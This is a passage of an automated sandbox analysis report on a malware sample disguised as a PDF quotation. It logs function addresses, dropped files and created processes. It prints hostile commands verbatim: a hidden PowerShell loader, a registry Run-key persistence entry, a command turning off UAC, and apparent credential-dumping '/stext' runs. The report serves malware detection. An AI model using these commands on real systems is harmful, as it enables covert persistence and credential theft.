Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_0041FE83	18_2_0041FE83
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 18_2_00430F54	18_2_00430F54
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 19_2_004050C2	19_2_004050C2
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 19_2_004014AB	19_2_004014AB
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 19_2_00405133	19_2_00405133
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 19_2_004051A4	19_2_004051A4
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 19_2_00401246	19_2_00401246
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 19_2_0040CA46	19_2_0040CA46
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 19_2_00405235	19_2_00405235
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 19_2_004032C8	19_2_004032C8
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 19_2_004222D9	19_2_004222D9
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 19_2_00401689	19_2_00401689
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 19_2_00402F60	19_2_00402F60
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 22_2_004050C2	22_2_004050C2
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 22_2_004014AB	22_2_004014AB
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 22_2_00405133	22_2_00405133
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 22_2_004051A4	22_2_004051A4
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 22_2_00401246	22_2_00401246
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 22_2_0040CA46	22_2_0040CA46
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 22_2_00405235	22_2_00405235
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 22_2_004032C8	22_2_004032C8
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 22_2_004222D9	22_2_004222D9
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 22_2_00401689	22_2_00401689
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 22_2_00402F60	22_2_00402F60

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\BgImage.dll DBF91707FA157603BEA025A6411CDCB497AB11262C9C18B14DC431A45AA17C0B
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\UserInfo.dll 943B33829F9013E4D361482A5C8981BA20A7155C78691DBE02A8F8CD2A02EFA0

Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: String function: 00413DCE appears 48 times
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: String function: 00414060 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: String function: 00413CE8 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: String function: 00413D0C appears 36 times
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: String function: 00413D18 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: String function: 00413025 appears 78 times
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: String function: 00416760 appears 69 times

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:760:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-7CSH4D
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03

Source: Fatherhoods.exe, Fatherhoods.exe, 00000011.00000002.2231137977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: Fatherhoods.exe, Fatherhoods.exe, 00000012.00000002.2157879350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000015.00000002.2218752496.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Fatherhoods.exe, 00000007.00000002.2601725533.0000000022840000.00000040.10000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000011.00000002.2231137977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: Fatherhoods.exe, Fatherhoods.exe, 00000011.00000002.2231137977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: Fatherhoods.exe, Fatherhoods.exe, 00000011.00000002.2231137977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Fatherhoods.exe, Fatherhoods.exe, 00000011.00000002.2231137977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: Fatherhoods.exe, 00000011.00000002.2234766300.0000000000A0A000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000011.00000003.2229531439.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2257766759.0000000002236000.00000004.00000020.00020000.00000000.sdmp, Fatherhoods.exe, 00000014.00000003.2256403629.0000000002235000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Fatherhoods.exe, Fatherhoods.exe, 00000011.00000002.2231137977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Fatherhoods.exe, 00000014.00000002.2256987761.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: unknown	Process created: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe "C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe"
Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Diffusibleness=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga';$Bimana=$Diffusibleness.SubString(14599,3);.$Bimana($Diffusibleness)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe "C:\Users\user\AppData\Local\Temp\Fatherhoods.exe"
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)"
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\yclmrmwzwbdunxrzdoz"
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\ieqxsfhtkjvzqdndurmsqf"
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\tydqtxsuyrnmajbpdcyttscnyt"
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\qqfaqoxzawjkoyuyo"
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\akkkrhibwebpzeqcfkuhx"
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\lepdszsvkmtcbkegougjiype"
Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Diffusibleness=Get-Content 'C:\Users\user\AppData\Local\kilns\Unobtainably\Gyldigheden146.Aga';$Bimana=$Diffusibleness.SubString(14599,3);.$Bimana($Diffusibleness)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe "C:\Users\user\AppData\Local\Temp\Fatherhoods.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\yclmrmwzwbdunxrzdoz"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\ieqxsfhtkjvzqdndurmsqf"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\tydqtxsuyrnmajbpdcyttscnyt"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\qqfaqoxzawjkoyuyo"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\akkkrhibwebpzeqcfkuhx"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Process created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe C:\Users\user\AppData\Local\Temp\Fatherhoods.exe /stext "C:\Users\user\AppData\Local\Temp\lepdszsvkmtcbkegougjiype"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preoccupant" /t REG_EXPAND_SZ /d "%Stableres% -windowstyle minimized $Netbrum=(Get-ItemProperty -Path 'HKCU:\Toponymist\').Berufsverbots;%Stableres% ($Netbrum)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Unpacked PE file: 17.2.Fatherhoods.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Unpacked PE file: 18.2.Fatherhoods.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Unpacked PE file: 19.2.Fatherhoods.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Unpacked PE file: 20.2.Fatherhoods.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Unpacked PE file: 21.2.Fatherhoods.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Unpacked PE file: 22.2.Fatherhoods.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Supersincerity $Fyrreskovene $printerdisketter), (Konverteringsplanen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Mesorrhiny = [AppDomain]::CurrentDoma
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Surkaal)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Kondenseringerne, $false).DefineType($Amnestiet,

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_03681BF9 push eax; iretd	2_2_03681C49
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07C31EF1 push ds; ret	2_2_07C31EFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07C30EFD push cs; ret	2_2_07C30F06
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07C35943 push edx; ret	2_2_07C35946
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07C35934 push eax; ret	2_2_07C3593A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0963B72C push edx; iretd	2_2_0963B72D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0963AC64 push ds; ret	2_2_0963AC66
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0963A824 push FFFFFF81h; retf	2_2_0963A82B
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C306C3 push cs; ret	7_2_22C306CA
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C322D8 push edi; retn 0022h	7_2_22C322DA
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C322F8 push edi; retn 0022h	7_2_22C322FA
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C30693 push cs; ret	7_2_22C306AA
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C32299 push esp; retn 0022h	7_2_22C3229A
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C306AB push cs; ret	7_2_22C306B2
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C306B3 push cs; ret	7_2_22C306BA
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C306BB push cs; ret	7_2_22C306C2
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C3066B push cs; ret	7_2_22C30672
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C30673 push cs; ret	7_2_22C30692
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C32279 push ecx; retn 0022h	7_2_22C3227A
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C31E0F push ds; ret	7_2_22C31E12
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C3061B push cs; ret	7_2_22C3062A
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C31E2C push ds; ret	7_2_22C31E32
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C3063B push cs; ret	7_2_22C3064A
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C2FFCF push es; ret	7_2_22C2FFD2
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C2FFD3 push es; ret	7_2_22C2FFDA
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C2FFDB push es; ret	7_2_22C2FFE2
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C2DBA1 push ebx; retn 0022h	7_2_22C2DBA2
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C2FFB1 push es; ret	7_2_22C2FFC2
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C22806 push ecx; ret	7_2_22C22819
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C2DC04 push edx; retn 0022h	7_2_22C2DC0A
Source: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Code function: 7_2_22C31DFB push ds; ret	7_2_22C31DFE

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\Fatherhoods.exe	Jump to dropped file
Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	File created: C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\BgImage.dll	Jump to dropped file
Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	File created: C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\nsDialogs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	File created: C:\Users\user\AppData\Local\Temp\nsjD34C.tmp\UserInfo.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Preoccupant			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Preoccupant			Jump to behavior

Source: C:\Users\user\Desktop\RFQ24060084#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
